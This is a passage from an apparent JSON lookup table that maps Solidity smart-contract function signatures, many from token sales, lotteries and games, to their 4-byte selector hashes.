"0x891fe103", "tier1Reached()": "0x173d6ca2", "priceStar3()": "0x8d5d1e97", "wavesAgent()": "0x9af9f012", "lastPot()": "0xf27ee76c", "TOKEN_TEAM()": "0x8cac1939", "level_2_percent()": "0x5947cc6a", "ttlInvestCount()": "0x52dca247", "preICOtokensSold()": "0x48403ad4", "maxGasPricePenalty()": "0x1f3dcc8d", "migrationFinishedTime()": "0x8669e08c", "startingInsuranceBalance()": "0x8454665d", "localityCode()": "0x27ed31ff", "runningRound()": "0xd3f2e7cf", "FACTOR_8()": "0xf2c8b676", "bonusForEveryone()": "0xf3b5a5af", "firstStage()": "0xec3f3636", "CROWD_WAVE2_BONUS()": "0xfe28d1d8", "toteLiquidatorTranserComplete()": "0xaf5d4013", "CROWDSALE_WEI_CAP()": "0x98f3c443", "preICOduration()": "0xf2a0928d", "fcc()": "0x754a77f5", "bonusEnds4()": "0xb8d117fc", "ICOendTime()": "0x9ff4125a", "incNT()": "0xb0686584", "PRE_ICO_START_TIME()": "0xf4e9c944", "revertMe()": "0x2ef4d922", "withdrawGasCost()": "0xac22cec8", "currentEtherRateInCents()": "0xc2777ce3", "getBattlesCount()": "0x9cc429dc", "getSuppliers()": "0x43516832", "esopState()": "0x3890d77f", "BILLION_TOKENS()": "0xb13c8fe0", "hardcapInEther()": "0x5b859500", "RESERVED_TOKENS_OPERATIONAL_EXPENSES()": "0x1b31c5c2", "killPay()": "0x02667e9b", "sentTokensToFounders()": "0x6a0d3450", "TOTAL_TOKEN_AMOUNT()": "0xfc976827", "autoAirdropAmount()": "0x7854216b", "issueRateDecDuringICO()": "0x301c42d7", "MIN_LIMIT()": "0x4d1a08cd", "developersTokensWallet()": "0xf6ee2d8d", "totalLossAmount()": "0x5ac207ff", "isEarlyBonus()": "0xef11e55b", "importSequence()": "0x0245c5c8", "lockReleaseDate2year()": "0x565118f7", "buyTokenPerEther()": "0xaf5ee700", "maxSalesAllowed()": "0x1ff1a378", "PoolPreICO()": "0xe41adb25", "authorizerOne()": "0x1b005a38", "mineableSupply()": "0xd6fb1678", "rouletteOwner()": "0x03999795", "ICloudSecAddress()": "0x357d4d1a", "bonusAdd()": "0x91bc8a45", "ethMax()": "0x48989182", "PLATFORM_FEE_RATE()": "0x2930fa49", "firstWeekBonus()": "0xa1b258c1", "buyPriceEth()": "0x5639bb3c", "referral_address()": "0x826cc57a", "priceChangeName()": "0x505a202b", "wolf3Balance()": "0xd8a79d87", "individualMaxCap()": "0xf5a30cee", "VALUE_OF_UTS()": "0xb2d5e8b1", "totalNumberOfFunders()": "0xc7968135", "crowdSaleSoldAmount()": "0xf3cca5b4", "latestprice()": "0x7dd9fcf7", "defaultSalePrice()": "0x45ed68e8", "iceFund()": "0x31de7e72", "safeWithdrawAll()": "0xf6b10854", "year()": "0xf3269716", "MIN_PRICE_SALE()": "0xbe62e98e", "preSaleZxcCap()": "0x00df415e", "pressFee()": "0x1c28b99e", "rewardEvery100000Draw7(uint256)": "0x01a50001", "rewardEvery1000Draw7(uint256)": "0xcb92c28d", "rewardLast7Draw(uint256)": "0x0ab4846c", "rewardBobaBase(uint256)": "0xcde2c35a", "tweetIt(string)": "0xa14d6517", "CLKToken(address)": "0xe787b523", "MostValuableCoin()": "0x0163d8ff", "changeINAWallet(address)": "0xe438ff55", "releaseINATokenToTeam()": "0xd47d3202", "releaseINAToken()": "0x8a024a3f", "calculateObtainedINA(uint256)": "0x6b7976c8", "addMultipleAddressesToPublicBuyerList(address[])": "0x71f9b7f3", "addAddressToPublicBuyerList(address)": "0x6446a339", "unlockPublic()": "0x47cade2b", "PlutoToken()": "0x4b9d5047", "_updatePurchasingState(address)": "0x37077409", "_distributeToken(address)": "0x2dad6b6a", "setCollectTokenTime(uint256)": "0x959b6916", "settleExtraToken(address)": "0xf8a5399a", "settleDeposit()": "0x559ec80d", "OrigoToken()": "0xf4e62c34", "fillOrder(bytes32,address[5],uint256[6],uint8,bytes32,bytes32)": "0xc87a31cd", "FirstDropToken()": "0x0bc4ec45", "getDepositAmount()": "0x7d96f693", "depositsOpen()": "0x549c4627", "depositsClosed()": "0xa369b0ac", "_refundExcess(address,uint256)": "0xf89ea906", "returnExcess(address)": "0x1249209e", "setWeiCapPerAddress(uint256)": "0x4a71a768", "BearTrap()": "0x13a0c990", "SmartBondsSale()": "0x7ae0c915", "LENTToken()": "0xa721c06c", "PenaQuantumLeapToken()": "0x0620b2af", "ParentKidsLinkToken(uint256,string,string)": "0x8e43e70e", "Sort()": "0x2815741c", "ABsCoins(address,uint256)": "0x373eef4b", "MONTANATOKEN()": "0x972ca383", "balanceOfCall(address)": "0xabd437da", "SahilToken()": "0xe2153231", "IFIN()": "0x97aeb405", "construtor(uint256)": "0xf5cbf6cc", "getTotalSeconds()": "0xdbafd0f2", "getMyDividendAmount()": "0x69423429", "getMySecondAmount()": "0x6f691500", "getTotalEtherOfAllRounds()": "0xbce1cdc3", "getTotalEtherOfCurrentRound()": "0x066636da", "getCurrentStartTime()": "0x5f7033e5", "getCurrentICOExpirationTime()": "0x9bd5679e", "getCurrentExpirationTime()": "0x735d8876", "dayaToken()": "0xa951f28e", "setRaiseLimit(uint256)": "0x2e860fc2", "setTimeBegin(uint256)": "0x221b5ec2", "setStopStatus(bool)": "0x1fb168ac", "takeAllEther(address)": "0x98390730", "changeWhitelistOnly(bool)": "0x9e321f42", "isWhitelistOnlyStatus()": "0xe642b7b6", "Ploutos()": "0x3a79311f", "HJToken()": "0x279b9c7b", "NFXCoin()": "0x202a6ce0", "RedBlueToken2()": "0xaa404876", "HYToken()": "0x3478ab86", "NegToken(uint256,string,uint8,string)": "0x43a68f3a", "UMCCToken()": "0x8ad2739b", "etherDonation(bool)": "0x3a0e2475", "distribute(address,uint256,address)": "0xe74915d0", "participateEvent(address)": "0xc5b7c51b", "conversion(uint256)": "0xba4d0c99", "gameoverGetYUM(uint256)": "0x57ddf217", "getYumWithETH(uint256)": "0x19162a30", "EBIToken()": "0x41d00b1d", "EtherToken(uint256,string,string)": "0xa8fdb290", "KongToken()": "0x6b764632", "Sukiyaki()": "0x7d14500a", "getStageCount()": "0x16ceaa95", "setPreSaleTokens(uint256)": "0x05d53802", "addStage(uint256,uint256,uint256,uint64,uint64,uint256)": "0xcee594c8", "tokensToUsd(uint256,uint8)": "0x788bc8c0", "usdToTokens(uint256,uint8)": "0x263c6ec0", "usdToWei(uint256)": "0xa6a86130", "weiToUsd(uint256)": "0x8c733fdf", "updateStageCap(uint256)": "0x2b36316e", "claimBounty(address)": "0x98ff8075", "ensureCurrentStage()": "0x2df7c637", "mintBounty(address[],uint256[])": "0x47bc3e51", "mintPreSaleTokens(address[],uint256[],uint256[])": "0xf53b8ded", "getScheduledTimelockCount(address)": "0x0e856588", "releaseBatch(address[])": "0xdf745d28", "scheduleTimelock(address,uint256,uint256)": "0xd7d9fef0", "logUI(string,uint256)": "0x25e8f38c", "operatorBurn(address,uint256,bytes,bytes)": "0xfc673c4f", "defaultOperators()": "0x06e48538", "porcoToken()": "0x9b7d83e7", "core(uint256)": "0xa546cbf7", "wangxihaoToken(address,address)": "0x665851bb", "SM()": "0xa5a54ea5", "chetan(uint256,string,uint8,string)": "0x9ee9c8b5", "getWifiPwd(string)": "0x12468cc5", "addWifi(string,string)": "0x446c0955", "DNATIXToken()": "0x581191f7", "changePass(bytes32)": "0xa707ce55", "getCheckoutTime()": "0x183718d1", "getCurLevelKeyNum()": "0x779b2e11", "getNextKeyTime()": "0x525417f1", "getPots()": "0x6a8896b6", "getGameTime()": "0x9d21dd78", "SCC()": "0x0fb35574", "ElephantToken(uint256,string,string)": "0xb0d56da6", "stakingBonus(uint256,uint256,uint256)": "0x2120e527", "IsValidAddress(address)": "0xfc57fadf", "getStakingReward(uint256)": "0xabfe35ad", "revokeStaking(address)": "0x0f29eb73", "freezeStaking(address)": "0x9b612a1b", "freezeAmount()": "0xfe836931", "getStakedAddress(address)": "0x7a5df22b", "getStakedAddresses()": "0x680b9d49", "stack(address,uint256,uint256)": "0x8208df23", "uzziToken()": "0xdb97c24d", "getPlayerGoodList(address)": "0x18039230", "getRoundJackpot(uint256)": "0x98f04128", "getEarningsAmountByGoodsIndex(uint256)": "0x678bbf24", "getStageTargetAmount(uint256)": "0xd9daa497", "bankerFeeDataRecord(address,uint256,uint256)": "0x77d89406", "playerDataRecord(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xbec5e7b2", "buyStageDataRecord(uint256,uint256,uint256,uint256,uint256,uint256)": "0xfb7a809c", "buyDataRecord(uint256,uint256,uint256,uint256,uint256,uint256)": "0x91e30ec3", "multiStake(uint256,uint256,uint256,uint256,uint256)": "0x1e93d358", "buyAnalysis(uint256,uint256,address)": "0x9d1c4d42", "withdrawByGid(uint256)": "0xb604ed1b", "buyXname(uint256,uint256,string)": "0xcca63f4f", "buy(uint256,uint256,address)": "0x59a87bc1", "purchaseCard(uint256)": "0xa54447aa", "closeModifyCountdown()": "0x2d6ddfda", "openModifyCountdown()": "0xef8c2c58", "registered(string)": "0x5d2d5c37", "zeastadscredits()": "0x4166eab4", "LOBO()": "0x2bbd88f3", "distr0(address,uint256)": "0x5397c83c", "finishZeroDistribution()": "0x500e9eaa", "BlockGrainCoin()": "0x9d62f07b", "getAddressByName(string)": "0x9a65ddec", "byte32ToString(bytes32)": "0xe29f5182", "MicinRasaJamur()": "0x87ede474", "addItemTo(address,uint256,uint256,uint256,string)": "0xf5620ed6", "setSuperOwner(address)": "0x29fa7266", "setValue(uint256,uint256,uint256)": "0xeb63eadd", "getClass(uint256)": "0x512d62df", "getRarity(uint256)": "0x48758697", "getUID(uint256)": "0xe9dd7b6c", "setType(uint256,uint256)": "0x3ac70266", "setClass(uint256,uint256)": "0x14d67848", "setRarity(uint256,uint256)": "0xe984d794", "setUID(uint256,uint32)": "0x6fbc8456", "createItem(uint256,uint256,uint256,uint32)": "0x719102d7", "uint2hexstr(uint256)": "0x3c93d8be", "bidEnd(uint256)": "0x22766696", "SimpleBid(address,uint256,uint256)": "0x681f6486", "createCertification(uint256,uint256)": "0x7fa7acf8", "win(address,uint256)": "0xee6ab4a6", "testPoint(uint256[3])": "0x7f08a250", "testTrip(uint256[3])": "0x6723c20d", "testInstant(uint256[3])": "0x1187648b", "playCEELO(bytes32,uint256[6])": "0x7136d509", "rollDices(uint256)": "0xe1d5e8eb", "getNextPrice()": "0x681ce98a", "gameStatusSet(bool)": "0x4bcd245d", "getCitationRecordsLength(string)": "0x771a2af4", "getCitationRecord(string,uint256)": "0x6959d5c7", "cite(string,string)": "0x4268db7d", "Sceatt()": "0x364deeef", "availableSTCTokens()": "0x331a9d73", "availableSTCDRTokensOF(address)": "0x5e217162", "getTokenToBurn()": "0x1b55ec45", "getLastSTCPrice()": "0x8c6589b2", "addEthBonusToBuy(address,uint256,uint256)": "0x0e70ab11", "transferTokensAfterEndTime(address,uint256,uint256,uint256)": "0x85fab341", "SWAP(address,address)": "0xa99a353b", "HOPPToken()": "0x6b7c0379", "Brave()": "0x4d6b3d83", "ownerBurn(uint256)": "0x3a4b3664", "closeEvent(uint256)": "0x2ee07c00", "cancelEvent(uint256)": "0x3f69babd", "createEvent(uint256,uint256,uint256,uint256,uint256,uint256,address[])": "0xff93a512", "checkIn(uint256,string)": "0x67deced2", "signUp(uint256,bytes32)": "0xe2deb962", "participated(address,uint256)": "0x1c442754", "eventExists(uint256)": "0xa3c28dfc", "getEventSecond(uint256)": "0x52757292", "getEventFirst(uint256)": "0xee00dd43", "_freeze(uint256)": "0x8c206979", "_mint(address,uint256,bytes32)": "0x75a747dc", "_removeToken(uint256)": "0x7f1bffc1", "_safeContract(address,address,address,uint256,bytes)": "0x77d58f21", "eventId(uint256)": "0x433b64b1", "tokenFrozen(uint256)": "0x513f99e7", "getDApp(string)": "0x91b9b640", "unFreezeToken(uint256)": "0x21d2daa0", "freezeToken(uint256)": "0xb6854f96", "KT07Coin(uint256,string,uint8,string)": "0x25d04034", "MasToken()": "0x58229d91", "AiTokenToken()": "0x7ec27000", "approveConnection(address,address,uint256)": "0x7320753b", "approveSender(address,address,bool,uint256,uint256)": "0xf6c9e930", "crossBalance()": "0xca37dfad", "settleBaseDeliveries()": "0xf6a46c2e", "chargeAll(uint256)": "0xd8567213", "charge()": "0x55161913", "setAccountInfo(address,address)": "0x7d71a19b", "addFeedOut(address,address,int256,uint256,uint256)": "0x4a4e6f95", "addFeedIn(address,address,int256,uint256,uint256)": "0xb78b7232", "buildCharging()": "0x325ab9ac", "buildConnection(address,address,address,int256,uint256,uint256)": "0xcd64d952", "DirectConnectionFactory()": "0xe43ac447", "setCostPerEnergy(uint256)": "0x449daa9a", "setCostPerDay(uint256)": "0x3be554d4", "setMeterPoint(int256,address,int256)": "0x0125ae62", "setTo(address)": "0x77233e90", "setFrom(address)": "0xf1437bd0", "value(uint256)": "0xc5a46ee6", "to(uint256)": "0xe887841e", "from(uint256)": "0x13357914", "SplitEqual(uint256)": "0x1663f4ee", "SplitWeighted(uint256)": "0xb99eccc1", "ChargeFix(uint256)": "0x4b4a456a", "ChargeEnergy(uint256)": "0xadc4f654", "addMeterPoint(int256,address,int256)": "0x6871d26b", "PricingDay(uint256)": "0x37f0fa43", "PricingEnergy(uint256)": "0x88b95242", "Connection(address,address)": "0x931983ad", "becomeTo()": "0x06c2b53c", "becomeFrom()": "0xa6a6a0d8", "Billing(uint256,uint256)": "0xd2368f64", "setReceiptLiablity(address,address)": "0xf76c1ea5", "setReceiptAsset(address,address)": "0x305939b0", "modifySender(address,bool)": "0x546e428c", "StromkontoProxy()": "0x796d8950", "build(address)": "0xf3701da2", "build()": "0x8e1a55fc", "addRx(address,address,uint256,uint256,bool)": "0x100ac510", "declineMP(address,int256)": "0xb81af39b", "approveMP(address,int256,uint8)": "0x15bbc15d", "setRelationFrom(uint8,address)": "0xe79248ea", "setRelation(uint8,address)": "0xf678cf02", "setDefault(uint8,address)": "0xcbb01884", "RoleLookup()": "0x15dff3b3", "monitor(address,bool)": "0x8d748148", "build(string)": "0x8ef6e7fe", "StringStorage(string)": "0xb0423141", "BitCompare(uint256,uint256)": "0x1b995aa7", "Reveal(uint256)": "0x1747b48b", "GetResult(uint256)": "0x6225a8ad", "Submit(uint256,bytes32,uint16)": "0x23dca40f", "StartCampaign()": "0x70d271ab", "CreateCampaign(uint16,uint16)": "0xee2383a6", "IsCampaignAvailable(uint256)": "0x079d2b96", "_DifficultyCalulate(uint16,uint16)": "0x6b0cc513", "Campaign(uint256,uint256,uint256,address)": "0xf272fe18", "CustomCrowdsale(uint256,uint256,uint256,uint256,address,address)": "0xf8ca3e22", "task()": "0x3283f641", "setSchedule(bytes2,bytes2,bytes2,bytes2,bytes2,bytes2,bytes2,uint256)": "0x9eae2453", "StandardTokenFreezer(address)": "0x1cef3c13", "frozenUntil(address)": "0xc215290a", "extendFreezeBy(uint256)": "0x3d456aa5", "freezeAllowance(uint256)": "0x52ece9be", "HolaMundo()": "0x7f1c25d0", "testDiv()": "0xe38cc06b", "testSub()": "0xca61cdac", "testStop()": "0xf89eae17", "authorize(uint8,bytes32,bytes32,address)": "0x792e1ffc", "ownerLives()": "0x73889677", "setHeartbeatTimeout(uint256)": "0x635a5d7b", "claimHeirOwnership()": "0x1c921e16", "proclaimDeath()": "0x24845131", "removeHeir()": "0xebf88de4", "timeOfDeath()": "0xb4a8f3e6", "heartbeatTimeout()": "0x7bca38be", "heir()": "0x91f2ebb8", "setHeir(address)": "0x23defc77", "Heritable(uint256)": "0xdeb43874", "addTokenInternal(address,address,uint256)": "0x1ec7cda4", "addMoneyInternal(address,uint256)": "0xaecaf4ba", "tokenTransfer(address,address,address,uint256)": "0xfb08937c", "withdrawTokens(address)": "0x49df728c", "constructProof(bytes32,bytes32[],bytes1[])": "0x31e7b060", "setBytes32Slice(bytes,uint256,bytes32)": "0x295c6e4d", "getBytes32Slice(bytes,uint256)": "0x627a326b", "verify(bytes32,bytes)": "0x258ae582", "deleteCertificate()": "0xafa936b8", "Certificate(bytes32,string)": "0x2d3ed075", "solve()": "0x890d6908", "checkSolved()": "0x93aef871", "isSolved()": "0x64d98f6e", "KarTokenERC20Advanced(uint256,string,string)": "0xa56f9bea", "KarTokenERC20(uint256,string,string)": "0x4f0b9a2b", "computeProfit(uint256,uint256,uint256)": "0x10290e51", "collectProfitERC20(address)": "0x1229987d", "collectProfit()": "0xc7faa88d", "collectOriginalBetERC20(address)": "0x106c0a45", "collectOriginalBet()": "0x203ab888", "betERC20(address,bool,uint256)": "0xbe5ea335", "checkAddERC20(address)": "0xd477e3d4", "getAddressBalance(address,address)": "0x50b62939", "getNumDIDHolders()": "0x9ac97e84", "getWeiAggregateMayInvest()": "0x6168ba3c", "rewardContributor(address,uint256)": "0x3b15a398", "getNumWeiAddressMayInvest(address)": "0x91555559", "pctDIDOwned(address,address)": "0xdff05de4", "incrementTasksCompleted(address)": "0xfdf31b39", "incrementDIDFromContributions(address,uint256)": "0x6a2875c1", "investEtherForDID()": "0xa723761a", "exchangeDIDForEther(uint256)": "0x87b30845", "decrementDID(address,address,uint256)": "0x17afd19a", "issueDID(address,uint256)": "0x0261a403", "revokeApproval(address,address)": "0xd3bfe76a", "updateInvestBalance()": "0xcc5fc0d7", "sendReferrer()": "0x8f14b76b", "L2Cash(address,address)": "0x134c1a28", "closePosition(bytes32,uint256,address,address,bytes)": "0x55c94f04", "getMaxMakerAmount(address,address,bytes)": "0x40876f6e", "checkAndCallApprove(address,uint256,bytes)": "0xb13d5180", "checkAndCallTransfer(address,address,uint256,bytes)": "0x5f88e83d", "onApprovalReceived(address,uint256,bytes)": "0x7b04a2d0", "onTransferReceived(address,address,uint256,bytes)": "0x88a7ca5c", "transferFromAndCall(address,address,uint256)": "0xd8fbe994", "getCrowdsalesLength()": "0xcf8bc918", "startCrowdsales(uint256)": "0x905529be", "setBonusRates(uint256[],uint256[])": "0x532ff308", "addMinters(address[])": "0x71e2a657", "addBalance(address,address,uint256,uint256)": "0xf4623e0b", "JadeCoinToken()": "0xee7f371c", "getYourRewardStock(address)": "0x98e8f365", "checkWithrawStock(address)": "0x350c0acf", "withdrawStock()": "0x5c6eb7ae", "testtoken()": "0x3fa69faa", "mintTokenForPreCrowdsale(address,uint256)": "0x010e3964", "TokenCrowdsale(uint256,uint256,address,uint256,address,address)": "0x53147d4f", "TeamAndAdvisorsAllocation(address)": "0x98cba526", "balanceOfTokens()": "0x1624288d", "requestMortgage(uint256[6],string,uint256,uint8,bytes32,bytes32)": "0xacddb63c", "setConverterRamp(address)": "0x8ba3ee95", "setRequiredTotal(uint256)": "0x1348ab3a", "setMaxSpend(uint256)": "0x62d2ecb9", "updateLandData(uint256,string)": "0x45837e5f", "cancelMortgage(uint256)": "0xdd83a303", "setCreator(address,bool)": "0x6eeb7a36", "getBet(address)": "0xf7566b49", "getRollResults(uint256,uint8,uint8,uint256,address)": "0xedfb4175", "getRollOutput(uint256,uint8,uint8,uint256,address)": "0xa1f56b0a", "getLastRollOutput(address)": "0xc8f3a9e1", "isBetValid(uint256,uint256,bytes)": "0xc1ed54a1", "finishBetFrom(address)": "0x6aa3bf8b", "resolveExpiredBets(uint256)": "0x6c9a5c61", "ownerSetGameName(string)": "0x754f579d", "ownerSetControllerAddress(address)": "0xa7f8a53c", "ownerSetResolverPercentage(uint256)": "0x29ab0ca7", "ownerResumeGame()": "0x6a561c11", "ownerPauseGame()": "0x3927010d", "getTokenBankrollAddressFromTier(uint8)": "0x3cb3d027", "isTokenBankroll(address,address)": "0x8e09ead7", "gamePayoutResolver(address,uint256)": "0x54cbe1e6", "payJackpotToWinner(address,uint256)": "0xf96777d4", "gameTokenResolution(uint256,address,uint256,address,uint256)": "0xa8ffa37f", "getDivRate(uint256)": "0x6528f4cb", "toSig(bytes)": "0xaff16621", "claim(uint256,address,uint256,bytes)": "0x99016142", "getSnap(uint256)": "0x42585b34", "walletCreateSnap(uint256,uint256)": "0xd4dc8e83", "getSnapsLength()": "0xbcd0b22a", "walletWithdrawTokens(uint256)": "0x2ffda952", "walletSetSigner(address)": "0x5f932d71", "walletSetWallet(address)": "0x251ed995", "ownerSetPaused(bool)": "0xaefb1643", "setMintSigner(address,int256)": "0x14e0246a", "toHexString(address)": "0x1bb0c665", "mintUsingSignature(uint256,uint8,bytes32,bytes32)": "0xf613f7a0", "setDRSCoinAddress(address)": "0xb2879d45", "setPlayerBookAddress(address)": "0xcd11731d", "setTeamPerfitAddress(address)": "0xd543f9d6", "getActivated()": "0x8893eb13", "distributeExternal(uint256)": "0xd359be70", "depositTeamPerfit(uint256)": "0x900863e7", "mintDRSCoin()": "0x66576514", "getTeamPerfit(uint256)": "0xbf9ab00c", "getDRSCoinDividend(uint256)": "0xc5980b07", "getWin(uint256)": "0x412c0c2d", "registerName(string,bool)": "0x60500245", "getTeamPerfitAmuont()": "0xe2d31df4", "withdrawTeamPerfit()": "0x45a2a3df", "profitEth()": "0x8b77071c", "CannabanC()": "0xc56af732", "Zignal()": "0x0c9f88c0", "VisionX()": "0x42b64a59", "voteXId(uint256,bool)": "0x7c129c1c", "createVote(bytes32,address,address,uint256,bool,string,string,uint256)": "0x1565f12f", "releasedAmount(address)": "0x1cf1bb72", "_resetReleaseTime(address)": "0xd14b691d", "transferLockAmount(address,uint256)": "0x9b69de79", "setUnitTime(uint256)": "0x289799b7", "getTransContractLocked()": "0xe6d343a5", "getGGCTokenBalance(address)": "0xaf1cd9f6", "AssignGGCPoolOwner(address)": "0x4a7bb697", "getPI_edit_5()": "0xcb6b8699", "setPI_edit_5(string)": "0xb9eb5511", "getPI_edit_4()": "0xff27cbda", "setPI_edit_4(string)": "0x3b8a3d5e", "getPI_edit_3()": "0xa9c0838d", "setPI_edit_3(string)": "0x1903c10e", "getPI_edit_2()": "0x87586b32", "setPI_edit_2(string)": "0x4588c1ef", "getPI_edit_1()": "0x298d5f33", "setPI_edit_1(string)": "0x290842a1", "PI_EDIT_2()": "0xb668efe7", "setFSTKCentral(address)": "0xea6c1258", "setFSTAddress(address)": "0xcd77521a", "transferOut(address,uint256)": "0x76890c58", "buyFunderSmartToken(string,string)": "0x136e1949", "PreSale()": "0x6c8e53e0", "totalFees()": "0x13114a9d", "fees()": "0x9af1d35a", "getBlocksRemaining()": "0x7941a062", "reignBlocks()": "0x544cfead", "prizeIncr()": "0x5552d1cb", "initialPrize()": "0x85663119", "collector()": "0x913e77ad", "decree()": "0x1218d6bf", "isPaid()": "0x209ebc08", "prevBlock()": "0x9d129afd", "blockEnded()": "0x962aab81", "numOverthrows()": "0xaa76994d", "prize()": "0xe3ac5d26", "monarch()": "0x95a50a9d", "sendFees()": "0xdff90b5b", "sendPrize(uint256)": "0x2398a6a6", "errorAndRefund(string)": "0x99116354", "overthrow(bytes23)": "0xdccfbb62", "setFirstBonusLimitPercent(uint256)": "0x8e66ca5f", "setFirstBonusPercent(uint256)": "0x95af7006", "retreiveTokens()": "0x34cad6b8", "setTarget(address)": "0x776d1a01", "setLocked(uint256)": "0x17d35f47", "mintExtendedTokens()": "0x7e00d77a", "updateInvested(uint256)": "0x338ff5e3", "transferToWallet(uint256)": "0xa18ccc8a", "setVestingPercent(uint256)": "0x4a867488", "cleanWallets()": "0xfcf40170", "addWallet(address,uint256)": "0x0a2a9a01", "removeAllowedAddress(address)": "0x3c9d93b8", "exitScam()": "0xc22fc384", "BoomerangLiquidity(uint256,address)": "0xe7c0e558", "_finish()": "0xf8af56b7", "_checkMaxRoundSupply(uint256)": "0xffef9b3c", "_receiveFunds()": "0x36abffd4", "mintPresale(address,uint256)": "0xe4f20fb2", "approveTx(uint8)": "0x2f430e17", "proposeTx(address)": "0x4f03c340", "reject(uint256)": "0xb8adaa11", "EthereumPrivateToken()": "0xba76e19b", "CryptessaLiquidCoin()": "0xbdd7c220", "Kin()": "0x9e6f2ea2", "stopTokenMinting()": "0x56cb6655", "mintTokensWithApproval(address,uint256,address)": "0x91fe7bab", "mintTokensWithIncludingInJackpot(address,uint256)": "0x3e2d7de1", "mintLockupTokens(address,uint256,uint256)": "0x88275b68", "balanceOfLockup(address)": "0x6da28481", "unlockFunds(address)": "0xd72ad259", "unlockSupervisedFunds(address)": "0xce230030", "unlockOwnFunds()": "0x5fe745ea", "transferMain(address,address,uint256)": "0xa51d5924", "distributeTokenSaleJackpot(uint256,uint256)": "0x8a17164c", "distributeJackpot(uint256)": "0x750e75d5", "addAddressToJackpotParticipants(address,uint256)": "0x3e4476a3", "processJackpotDeposit(uint256,uint256,address)": "0x38e2c296", "transferFromWithCustomReservingNet(address,address,uint256,uint256)": "0x35866368", "transferFromWithCustomReserving(address,address,uint256,uint256)": "0xad0096af", "transferFromWithReservingNet(address,address,uint256)": "0x5caabecf", "transferFromWithReserving(address,address,uint256)": "0x1b6ad60a", "transferWithCustomReservingNet(address,uint256,uint256)": "0xdaaa50c9", "transferWithCustomReserving(address,uint256,uint256)": "0x8cd0a573", "transferWithReservingNet(address,uint256)": "0x71f6fb88", "transferWithReserving(address,uint256)": "0xf4a011be", "clearJackpotParticipants()": "0xe3ec0666", "setPoliticsForJackpotParticipantsList(bool)": "0xbe395cd5", "setJackpotMinimumAmount(uint256)": "0xa87ebcb5", "setReservingStep(uint256)": "0xe92e4d63", "setMaxAllowedReservingPercentage(uint256)": "0x7fdd69f6", "setMinAllowedReservingPercentage(uint256)": "0xfa26db7e", "setReservingPercentage(uint256)": "0x11191186", "closeLotteryAndPickWinner()": "0x5dc1ba1b", "openLottery()": "0x9dfecdcc", "setMaxTokenBuyin(uint256)": "0xc87e5613", "donateToLottery()": "0xc9e9f4dc", "PoWMLottery()": "0x29516a47", "buy(address,bytes)": "0xb95c2740", "SimpleExchange(address,uint256)": "0x8394f639", "CursedToken()": "0xc2407089", "unfreezeAccount(address,bool)": "0x1e1781af", "purchase_tokens()": "0x0dc1819f", "personal_withdraw()": "0xbbf59a41", "set_refunded(bool)": "0xce7ab6a7", "set_token(address)": "0xcc63a3c9", "removeCode(string)": "0x57b45386", "registerNameXname(string,bool)": "0x7b3ca1c6", "registerNameXaddr(string,bool)": "0x1684844b", "registerNameXID(string,bool)": "0xfd3d8cdc", "reLoadXname(uint256)": "0xfaed08a9", "reLoadXid(uint256)": "0x19d7943a", "setRaiseRatio(uint256)": "0xe4b50ee8", "setRaisedAmount(uint256)": "0x0b7ddd25", "setMaxRaiseAmount(uint256)": "0xcd27d1a0", "setMaxWei(uint256)": "0xe8928f7a", "setExchangeFlag(bool)": "0x76db7fd4", "getFrozenAccount(address)": "0xc4977807", "multiFreeze(address[],bool[])": "0xc878dad9", "generateToken(address,uint256)": "0x188b5372", "changeowner(address)": "0x662e4ee4", "HuobiPoolToken()": "0xa0c16fb6", "XAUsToken()": "0x07ecdfe9", "addLegitRaceAddress(address)": "0x3a7562ee", "_addLegitRace(address)": "0xd52b5cb4", "createTimeLockContract()": "0x735307fb", "createVestingContract()": "0x59953744", "batchDistributeTokens(address[],uint256[])": "0x922c64ef", "EbocoinToken()": "0x178450bd", "getProtoIdByTokenId(uint256)": "0xc4fe2675", "initManager(uint256,uint256)": "0xac4ba3ea", "safeGiveByContract(uint256,address)": "0xaea13844", "getOwnTokens(address)": "0x3a562b78", "setMetadataProvider(address)": "0x64b09402", "getSafeContract(address)": "0x441deede", "setSafeContract(address,bool)": "0xcce0244d", "settotal(uint256)": "0xaa3022d0", "setshares(uint256,address)": "0x80f6c383", "deductshares(uint256,address)": "0x343ff8c7", "addshares(uint256,address)": "0xea32a8f4", "addmember(uint256,address)": "0xd01296d9", "withdrawOrderRefundToOrder(uint256)": "0xa5473f78", "withdrawOrderRefund(uint256)": "0x1f0f2ce4", "getOrderActualTotalRefundHelper(uint256,uint256)": "0x74bb3cb4", "getInviteeInfo(uint256)": "0x8c5b830e", "getAddressLost(address)": "0x0afa6dde", "getDayEthIn(uint256)": "0x31d35cb2", "getOrderStateHelper(uint256,uint256)": "0x91a73892", "doRefund(uint256,uint256,uint256)": "0xed045a3c", "orderCore(uint256,uint256,uint256)": "0x861e2e43", "orderInternal(uint256,bytes32)": "0xc3dc1040", "order(bytes32)": "0xe80160ab", "setPlayerDayEthInLimit(uint256)": "0xed17faa8", "setDayEthInLimit(uint256)": "0x15ac4c90", "distributeInviteReward(uint256,uint256,uint256,uint256,uint256)": "0x0d5269ab", "determineInviter(uint256,bytes32)": "0x3b357f4e", "enableInviteOfSU(string)": "0x7c0b2484", "enableInvite(string,bytes32)": "0xac82239f", "getDayIndex(uint256)": "0x03e4d9f5", "CommonToken()": "0x681e237d", "VotePumpCoin0x()": "0xacb02f7c", "calculateAffiliate(uint256,uint256,uint256)": "0xa732d6c4", "toCom(uint256)": "0x0a46706b", "reloadPlayerInfo(address)": "0x99b8e366", "validateName(string)": "0x9ffdb65a", "getBytesName(string)": "0xa4952f80", "receivePlayerInfo(uint256,address,bytes32,uint256,uint8)": "0x2341a1af", "isRoundActive(uint256)": "0x97ac4a25", "registerNameXname(string,bytes32,bool,uint8)": "0x8b5a64fb", "distributeRegisterFee(uint256,uint256,bytes32,uint8)": "0xa7c3ce60", "registerNameXnameFromDapp(address,bytes32,bytes32,bool,uint8)": "0xcbc7755c", "registerNameXaddrFromDapp(address,bytes32,address,bool,uint8)": "0xfad18e7b", "registerNameXIDFromDapp(address,bytes32,uint256,bool,uint8)": "0x5257c825", "setPlayerAffID(uint256,uint256)": "0xbe35525d", "updateRankBoard(uint256,uint256)": "0x143085c3", "getPlayerLevel(uint256)": "0xba996aca", "sendcdd(address,uint256,address)": "0x5be60644", "CDreamingICO()": "0xe0540d85", "LTYG()": "0x8d5d88c9", "closeTournament(bytes32)": "0x4f8d40e1", "createTournament(bytes32,uint256,uint256)": "0xc6e68ea6", 